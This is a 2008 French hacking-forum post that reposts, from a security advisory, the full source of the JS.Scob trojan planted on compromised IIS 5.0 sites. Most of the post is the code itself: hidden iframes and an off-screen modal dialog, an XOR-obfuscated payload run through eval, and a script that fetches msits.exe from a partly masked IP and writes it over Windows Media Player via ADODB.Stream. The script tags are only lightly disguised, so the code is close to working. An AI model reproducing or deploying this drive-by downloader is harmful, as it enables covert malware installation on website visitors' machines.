[Code Source] JS.Scob.Trojan Released

Moderator: Mod

[Code Source] JS.Scob.Trojan Released

Postby HackAngel » Sat Mar 29, 2008 4:49 pm

Publié à titre informatif uniquement.

[b:00c4e5402a]Vulnerable Systems:[/b:00c4e5402a] IIS version 5.0

[b:00c4e5402a]Note:[/b:00c4e5402a] All SCRIPT tags in the code have been replaced with harmless tags for security reasons.

[b:00c4e5402a]The order of script redirection is as follows:[/b:00c4e5402a]

Compromised -(redirect)-> http://217.107.218.***/dot.php -(redirect)-> new.htm -(execute)-> md.htm & shellscr!pt_loader.js -(execute)-> shellscr!pt.js -(install)-> msits.exe

[b:00c4e5402a]The code for the relevant parts is shown below:[/b:00c4e5402a]

[code:1:00c4e5402a]--------------------------------- Begin Code: new.htm ---------------------------------
<scr!pt language="Javascr!pt">
function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-10000\;dialogLeft:-
10000\;dialogHeight:1\;dialogWidth:1\;").location="javascr!pt'<SCR!PT SRC=\\'http://217.107.218.***/shellscr!pt_loader.js\\'><\/scr!pt>'";
}</scr!pt>
<scr!pt language="javascr!pt">setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100
);
setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.php" WIDTH=0
HEIGHT=0></IFRAME>');</scr!pt>
<scr!pt>
x=34;
es="84;66;86;5;73;119;71;89;95;91;12;16;14;88;89;95;86;92;67;27;85;69;9
3;88;78;94;108;82;78;74;48;105;107;120;73;79;48;38;58;105;37;9;35;41;55
;111;109;113;61;3;59;37;35;39;118;61;53;56;41;48;59;49;20;79;0;12;0;28;
93;106;98;6;40;4;8;20;64;28;4;8;30;22;90;23;23;20;19;30;8;20;9;19;26;60
;239;237;237;241;164;184;166;165;255;225;227;255;233;175;181;130;154;25
4;208;252;240;236;184;228;236;224;246;254;178;255;241;237;196;196;208;1
31;153;133;132;208;192;192;222;206;140;156;222;215;146;138;191;185;219;
247;217;211;193;151;211;213;210;216;204;247;148;140;142;254;227;249;169
;165;162;172;169;191;236;169;175;187;177;236;242;241;153;134;251;158;14
0;138;224;182;180;169;179;179;218;135;139;143;129;223;201;200;171;211;1
82;183;161;172;167;161;222;188;186;167;213;157;130;131;136;195;213;212;
206;204;201;209;305;305;309;301;310;308;318;297;313;317;317;292;291;352
;367;358;382;319;369;379;377;303;300;312;373;376;371;373;306;373;362;37
0;258;257;342;346;340;320;283;261;348;332;338;351;259;341;259;348;339;3
23;347;323;320;345;339;323;282;263;262;276;339;351;340;346;291;309;380;
356;383;328;332;296;280;294;314;318;316;355;317;295;319;294;378;358;356
;357;358;379;376;364;362;363;364;369;382;366;332;321;339;335;324;257;26
5;260;285;260;271;261;280;323;268;256;276;264;347;328;";
var ds=new String(); ads=es.split(";"); k=ads.length-1;
for(var j=0;j<k;j++)
{e=ads[j];d=e^x;x+=1;ds=ds+String.fromCharCode(d);}eval(ds)
</scr!pt>
---------------------------------- End Code: new.htm ----------------------------------

--------------------------------- Begin Code: shellscr!pt_loader.js ---------------------------------
function getRealShell() {
myiframe.document.write("<SCR!PT SRC='http://217.107.218.****/shellscr!pt.js'><\/SCR!PT>");
} document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=0 HEIGHT=0></IFRAME>"); setTimeout("getRealShell()",100);
---------------------------------- End Code: shellscr!pt_loader.js ----------------------------------

--------------------------------- Begin Code: shellscr!pt.js ---------------------------------
var szExt = unescape("%2E%65%78%65");
var szM = unescape("%6D");
var szMMS = szM + szM + "s://";
var szSTR= unescape("%53%74%72%65%61%6D");
var szADO = unescape("%41%44%4F%44%42%2E") + szSTR;
var szMS = "Microsoft"; var szWIN = unescape("%57%69%6E%64%6F%77%73");
var szHTTP = szMS + unescape("%2E%58%4D%4C%48%54%54%50");
var HTTP = new ActiveXObject(szHTTP); var METHOD =
unescape("%47%45%54");
var xx1=unescape("%4D%65%64%69%61"); var xx2 =
unescape("%50%6C%61%79%65%72");
var MP1=unescape("%43%3A%5C%5C%50%72%6F%67%72%61%6D"); var MP2 = " " + xx1
+ " " + xx2;
var szPL = "pl";
var MP = MP1 + " Files\\" + szWIN + MP2 + "\\wm" + szPL +
unescape("%61%79%65%72") + szExt;
var szURL = "http://217.107.218.***/msits.exe";
var i = 8 - 5;
var t = 7 - 6; HTTP.Open(METHOD, szURL, i-3); HTTP.Send();
var ADO = new ActiveXObject(szADO);
ADO.Mode = i; ADO.Type = t;
ADO.Open(); ADO.Write(HTTP.responseBody);
ADO.SaveToFile(MP, i-t); location.href=szMMS;
---------------------------------- End Code: shellscr!pt.js ----------------------------------

--------------------------------- Begin Code: md.htm ---------------------------------
<SCR!PT language="javascr!pt">
window.returnValue = window.dialogArguments;
function CheckStatus(){
try{tempVar=window.dialogArguments.location.href;}catch(e){window.close
();}
setTimeout("CheckStatus()",100);
}
CheckStatus();
</SCR!PT>
---------------------------------- End Code: md.htm ----------------------------------[/code:1:00c4e5402a]

[b:00c4e5402a]Source: [/b:00c4e5402a][url]http://www.securiteam.com/securitynews/5OP020ADFQ.html[/url]

Pour la Liberté...

HackAngel
User avatar
HackAngel
 
Posts: 871
Joined: Tue Dec 25, 2007 11:14 pm
Location: Quelque part entre ici et ailleurs...

Return to Virologie informatique

Who is online

Users browsing this forum: No registered users and 2 guests

cron